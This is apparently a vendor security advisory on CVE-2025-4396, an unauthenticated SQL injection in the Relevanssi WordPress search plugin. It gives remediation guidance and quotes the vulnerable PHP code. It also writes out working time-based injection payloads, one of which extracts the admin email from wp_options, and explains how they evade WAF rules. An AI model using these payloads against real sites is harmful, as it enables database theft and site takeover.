Go back

[CVE-2025-4396] Unauthenticated SQL Injection in Relevanssi Gives Attackers a Direct Line to Your WordPress Database

Volerion Research

TL;DR
The Relevanssi – A Better Search plugin for WordPress fails to escape the cats and tags parameters when it builds a raw taxonomy query. Versions up to 4.24.4 (Free) and 2.27.4 (Premium) are affected. An unauthenticated attacker can chain Boolean conditions or use time delays to extract data from the wp_posts and wp_terms tables. This is a textbook SQL injection that requires no authentication and no interaction, so any public WordPress site running Relevanssi is at risk until it upgrades.

1. Summary

CVE ID CVE-2025-4396
Affected Product(s) Relevanssi – A Better Search ≤ 4.24.4 (Free) and ≤ 2.27.4 (Premium) when activated on WordPress
Volerion Risk Score 7.1 / 10
Exploit Status No public PoC at publication time, but trivial to develop
CISA KEV No

Because search endpoints are often exposed to anonymous visitors, the attack surface is broad. Although the immediate goal is usually data leakage, an attacker can also steal administrator session cookies or create back-door users if the database account carries write permissions.

2. Context - Why a search plugin can bring down an entire site

Relevanssi replaces WordPress core search with a feature-rich engine that supports fuzzy matching, term weighting and taxonomy filters. To keep queries flexible, the plugin allows callers to specify category (cats) and tag (tags) filters through URL parameters. When those parameters feed directly into an SQL string, every WordPress site that enabled that feature inherits the vulnerability.

The plugin boasts more than 100 000 active installations according to the WordPress.org statistics page. That popularity means automated scanners will quickly pick up the new target, especially because the exploit can reveal the version number through WordPress metadata before attempting injection.

3. Technical Details - Where the escape sequence went missing

The heart of the bug is in lib/search-tax-query.php, shown below at the last vulnerable release.

// vulnerable snippet around line 371
if ( ! empty( $_GET['cats'] ) ) {
    $cats = $_GET['cats'];
    $sql  = "AND t.term_id IN ($cats)";
    $terms_where .= $sql;
}

The code concatenates the user supplied cats parameter into $sql without calling intval(), esc_sql() or $wpdb->prepare(). A similar construct exists for tags in lib/search.php near line 1016.

An attacker can therefore issue the following request to test if the site is vulnerable:

https://example.com/?s=test&cats=1) AND (SELECT IF(1=1,SLEEP(5),0))-- -

If the server hangs for roughly five seconds, the injection succeeded. From there, Boolean or time-based payloads allow extraction of arbitrary columns:

/?s=test&cats=1) AND (SELECT CASE WHEN (SUBSTR((SELECT option_value FROM wp_options WHERE option_name='admin_email'),1,1)='a') THEN SLEEP(2) ELSE 0 END)-- -

Because WordPress usually connects to MySQL with an account that can read and write every table, the attacker can also change administrator passwords or plant malicious JavaScript by editing stored posts.

Why the vulnerability bypasses common WAF rules

Many WordPress-specific WAF configurations whitelist the search path to reduce false positives. The injection string lacks dangerous characters like the single quote because the attacker can rely on parentheses and numeric constants. This slips past regular expressions that focus on ' OR 1=1-style patterns.

4. Impact - From data leakage to full site compromise

SQL injection on WordPress rarely stops at reading the database. With write access an attacker can:

While the plugin itself does not allow remote code execution, manipulating the database is often enough to reach RCE through the built-in theme editor or rogue plugins once an admin session is acquired.

5. Remediation - What defenders should do now

Upgrade Relevanssi to the newest version available in the WordPress plugin repository or the premium vendor portal. The maintainer has replaced string concatenation with $wpdb->prepare() and added intval() casts for numeric parameters. If an immediate upgrade is not possible:

Backups taken before remediation should be checked for signs of tampering, especially new administrator accounts or unexpected changes to the wp_options table.

6. Timeline

Date (UTC)Milestone
2025-05-13CVE-2025-4396 published
2025-05-13Volerion completes enrichment and publishes risk score

7. References

About Volerion

Volerion delivers AI-driven enrichment minutes after a CVE goes live. A single call to our REST API returns CVSS 4.0 vectors, exploitability metrics and affected products complete with remediation. Additionally, we offer different scoring profiles, complete with insight into the eight comprehensive categories that make up the final score. Our API is also available in the tradditional NVD API 2.0 format, so integration is as simple as swapping hosts. Spend less time parsing CVEs and more time closing them.

How the Volerion Risk Score Fits With CVSS, EPSS and KEV

At the time of writing:

The Volerion Risk Score brings these signals together and layers them with additional factors such as affected product prevalence, exploit maturity and remediation effort. For CVE-2025-4396 the score is 7.1, placing it in our high-risk band and highlighting that defenders should patch quickly even though the CVSS and EPSS signals are not at their maximum.

Share this post on:
Share this post via WhatsAppShare this post on FacebookShare this post on XShare this post via TelegramShare this post on PinterestShare this post via email
Previous Post
[CVE-2025-47276] Actualizer Uses Weak SHA-512 Password Hashing in Generated Debian Images
Next Post
[CVE-2025-46814] FastAPI Guard’s X-Forwarded-For Handling Lets Attackers Impersonate Trusted IPs